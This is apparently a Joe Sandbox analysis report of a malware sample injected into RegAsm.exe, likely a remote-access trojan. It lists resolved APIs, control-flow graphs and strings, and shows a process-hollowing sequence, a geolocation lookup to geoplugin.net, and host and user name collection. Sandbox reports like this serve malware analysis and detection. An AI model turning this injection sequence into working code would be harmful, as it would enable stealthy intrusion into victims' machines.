55711->55712 55713 4117db SetLastError 55711->55713 55712->55678 55713->55678 55714->55687 55715->55700 55717 4118c0 55716->55717 55718 411816 ctype ___scrt_fastfail 55716->55718 55717->55702 55718->55717 55719 4117d7 SetLastError 55718->55719 55719->55718 55721 411ca5 55720->55721 55722 411bbb IsBadReadPtr 55720->55722 55721->55697 55730 41198a 55721->55730 55722->55721 55728 411bd5 55722->55728 55725 411cbd SetLastError 55725->55721 55726 411ca7 SetLastError 55726->55721 55727 411c8a IsBadReadPtr 55727->55721 55727->55728 55728->55721 55728->55725 55728->55726 55728->55727 55743 440f5d 22 API calls 5 library calls 55728->55743 55734 4119b0 55730->55734 55731 411a99 55732 4118ed VirtualProtect 55731->55732 55733 411aab 55732->55733 55733->55706 55734->55731 55734->55733 55744 4118ed 55734->55744 55737 10002215 55736->55737 55738 1000221a dllmain_dispatch 55736->55738 55748 100022b1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 55737->55748 55738->55708 55740->55692 55741->55695 55742->55707 55743->55728 55745 4118fe 55744->55745 55747 4118f6 55744->55747 55746 411971 VirtualProtect 55745->55746 55745->55747 55746->55747 55747->55734 55748->55738 55749 40165e 55750 401666 55749->55750 55752 401669 55749->55752 55751 4016a8 55753 43455e new 22 API calls 55751->55753 55752->55751 55754 401696 55752->55754 55755 40169c 55753->55755 55756 43455e new 22 API calls 55754->55756 55756->55755 55757 426cdc 55762 426d59 send 55757->55762 55763 10001f3f 55764 10001f4b ___DestructExceptionObject 55763->55764 55781 1000247c 55764->55781 55766 10001f52 55767 10002041 55766->55767 55768 10001f7c 55766->55768 55775 10001f57 ___scrt_is_nonwritable_in_current_image 55766->55775 55797 10002639 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 55767->55797 55792 100023de IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 55768->55792 55771 10002048 55772 10001f8b __RTC_Initialize 55772->55775 55793 100022fc RtlInitializeSListHead 55772->55793 55774 10001f99 ___scrt_initialize_default_local_stdio_options 55794 100046c5 5 API calls _ValidateLocalCookies 55774->55794 55777 10001fad 55777->55775 55795 100023b3 IsProcessorFeaturePresent ___isa_available_init ___scrt_release_startup_lock 55777->55795 55779 10001fb8 55779->55775 55796 10004669 5 API calls _ValidateLocalCookies 55779->55796 55782 10002485 55781->55782 55798 10002933 IsProcessorFeaturePresent 55782->55798 55784 10002491 55799 100034ea 55784->55799 55786 10002496 55791 1000249a 55786->55791 55808 100053c8 55786->55808 55789 100024b1 55789->55766 55791->55766 55792->55772 55793->55774 55794->55777 55795->55779 55796->55775 55797->55771 55798->55784 55800 100034ef ___vcrt_initialize_winapi_thunks 55799->55800 55812 10003936 6 API calls 2 library calls 55800->55812 55802 100034f9 55803 100034fd 55802->55803 55813 100038e8 55802->55813 55803->55786 55805 10003505 55806 10003510 55805->55806 55821 10003972 RtlDeleteCriticalSection 55805->55821 55806->55786 55840 10007457 55808->55840 55811 10003529 7 API calls 3 library calls 55811->55791 55812->55802 55822 10003af1 55813->55822 55816 100038fd 55816->55805 55818 1000390b 55819 10003918 55818->55819 55828 1000391b 5 API calls ___vcrt_FlsFree 55818->55828 55819->55805 55821->55803 55829 10003a82 55822->55829 55824 10003b0b 55825 10003b24 TlsAlloc 55824->55825 55826 100038f2 55824->55826 55826->55816 55827 10003ba2 5 API calls try_get_function 55826->55827 55827->55818 55828->55816 55830 10003aaa 55829->55830 55832 10003aa6 __crt_fast_encode_pointer 55829->55832 55830->55832 55833 100039be 55830->55833 55832->55824 55834 100039cd try_get_first_available_module 55833->55834 55835 100039ea LoadLibraryExW 55834->55835 55837 10003a60 FreeLibrary 55834->55837 55838 10003a77 55834->55838 55839 10003a38 LoadLibraryExW 55834->55839 55835->55834 55836 10003a05 GetLastError 55835->55836 55836->55834 55837->55834 55838->55832 55839->55834 55843 10007470 55840->55843 55841 10002ada _ValidateLocalCookies 5 API calls 55842 100024a3 55841->55842 55842->55789 55842->55811 55843->55841 55844 10005bff 55852 10005d5c 55844->55852 55846 10005c13 55849 10005c1b 55850 10005c28 55849->55850 55860 10005c2b 10 API calls 55849->55860 55853 10005c45 _abort 4 API calls 55852->55853 55854 10005d83 55853->55854 55855 10005d9b TlsAlloc 55854->55855 55856 10005d8c 55854->55856 55855->55856 55857 10002ada _ValidateLocalCookies 5 API calls 55856->55857 55858 10005c09 55857->55858 55858->55846 55859 10005b7a 19 API calls 2 library calls 55858->55859 55859->55849 55860->55846

                            Control-flow Graph

                            APIs
                            • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                            • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                            • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                            • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                            • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                            • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                            • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                            • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                            • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                            • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                            • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                            • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                            • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                            • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                            • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                            • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                            • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                            • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                            • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                            • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad$HandleModule
                            • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                            • API String ID: 4236061018-3687161714
                            • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                            • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                            • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                            • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 448 41812a-418153 449 418157-4181be GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 4181c4-4181cb 449->450 451 4184bb 449->451 450->451 453 4181d1-4181d8 450->453 452 4184bd-4184c7 451->452 453->451 454 4181de-4181e0 453->454 454->451 455 4181e6-418213 call 436f10 * 2 454->455 455->451 460 418219-418224 455->460 460->451 461 41822a-41825a CreateProcessW 460->461 462 418260-418288 VirtualAlloc GetThreadContext 461->462 463 4184b5 GetLastError 461->463 464 41847f-4184b3 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->464 465 41828e-4182ae ReadProcessMemory 462->465 463->451 464->451 465->464 466 4182b4-4182d6 NtCreateSection 465->466 466->464 467 4182dc-4182e9 466->467 468 4182eb-4182f6 NtUnmapViewOfSection 467->468 469 4182fc-41831e NtMapViewOfSection 467->469 468->469 470 418320-41835d VirtualFree NtClose TerminateProcess 469->470 471 418368-41838f GetCurrentProcess NtMapViewOfSection 469->471 470->449 472 418363 470->472 471->464 473 418395-418399 471->473 472->451 474 4183a2-4183c0 call 436990 473->474 475 41839b-41839f 473->475 478 418402-41840b 474->478 479 4183c2-4183d0 474->479 475->474 480 41842b-41842f 478->480 481 41840d-418413 478->481 482 4183d2-4183f5 call 436990 479->482 484 418431-41844e WriteProcessMemory 480->484 485 418454-41846b SetThreadContext 480->485 481->480 483 418415-418428 call 41853e 481->483 491 4183f7-4183fe 482->491 483->480 484->464 489 418450 484->489 485->464 490 41846d-418479 ResumeThread 485->490 489->485 490->464 493 41847b-41847d 490->493 491->478 493->452
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                            • GetProcAddress.KERNEL32(00000000), ref: 00418174
                            • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                            • GetProcAddress.KERNEL32(00000000), ref: 00418188
                            • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                            • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                            • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                            • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                            • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                            • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                            • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00418328
                            • NtClose.NTDLL(?), ref: 00418332
                            • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                            • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                            • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                            • ResumeThread.KERNEL32(?), ref: 00418470
                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                            • GetCurrentProcess.KERNEL32(?), ref: 00418492
                            • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                            • NtClose.NTDLL(?), ref: 004184A3
                            • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                            • GetLastError.KERNEL32 ref: 004184B5
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
                            • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                            • API String ID: 316982871-3035715614
                            • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                            • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                            • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                            • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1553 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1560 10001177-1000119e lstrlenW FindFirstFileW 1553->1560 1561 10001168-10001172 lstrlenW 1553->1561 1562 100011a0-100011a8 1560->1562 1563 100011e1-100011e9 1560->1563 1561->1560 1564 100011c7-100011d8 FindNextFileW 1562->1564 1565 100011aa-100011c4 call 10001000 1562->1565 1564->1562 1567 100011da-100011db FindClose 1564->1567 1565->1564 1567->1563
                            APIs
                            • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                            • lstrcatW.KERNEL32(?,?), ref: 10001151
                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                            • FindClose.KERNEL32(00000000), ref: 100011DB
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                            • String ID:
                            • API String ID: 1083526818-0
                            • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                            • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                            • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                            • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                              • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                              • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                            • Sleep.KERNEL32(00000BB8), ref: 0040F896
                            • ExitProcess.KERNEL32 ref: 0040F905
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseExitOpenProcessQuerySleepValue
                            • String ID: 5.1.1 Pro$`.S$override$pth_unenc
                            • API String ID: 2281282204-4241259013
                            • Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                            • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                            • Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                            • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1616 41b411-41b454 call 4020df call 43bda0 InternetOpenW InternetOpenUrlW 1621 41b456-41b477 InternetReadFile 1616->1621 1622 41b479-41b499 call 4020b7 call 403376 call 401fd8 1621->1622 1623 41b49d-41b4a0 1621->1623 1622->1623 1624 41b4a2-41b4a4 1623->1624 1625 41b4a6-41b4b3 InternetCloseHandle * 2 call 43bd9b 1623->1625 1624->1621 1624->1625 1630 41b4b8-41b4c2 1625->1630
                            APIs
                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                            • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                            • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                            • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                            • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                            Strings
                            • http://geoplugin.net/json.gp, xrefs: 0041B448
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleOpen$FileRead
                            • String ID: http://geoplugin.net/json.gp
                            • API String ID: 3121278467-91888290
                            • Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                            • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                            • Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                            • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                            APIs
                              • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                            • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                            • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                            • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                              • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                            • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                            • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                              • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                              • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                            • String ID:
                            • API String ID: 3950776272-0
                            • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                            • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                            • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                            • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                            APIs
                            • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,005395D0), ref: 004338DA
                            • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Crypt$Context$AcquireRandomRelease
                            • String ID:
                            • API String ID: 1815803762-0
                            • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                            • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                            • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                            • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                            Strings
                            • GetSystemTimePreciseAsFileTime, xrefs: 004489F2
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$FileSystem
                            • String ID: GetSystemTimePreciseAsFileTime
                            • API String ID: 2086374402-595813830
                            • Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                            • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                            • Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                            • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                            APIs
                            • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                            • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Name$ComputerUser
                            • String ID:
                            • API String ID: 4229901323-0
                            • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                            • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                            • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                            • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                            • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                            • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                            • Instruction Fuzzy Hash:

                            Control-flow Graph

                            • Executed
                            • Not Executed
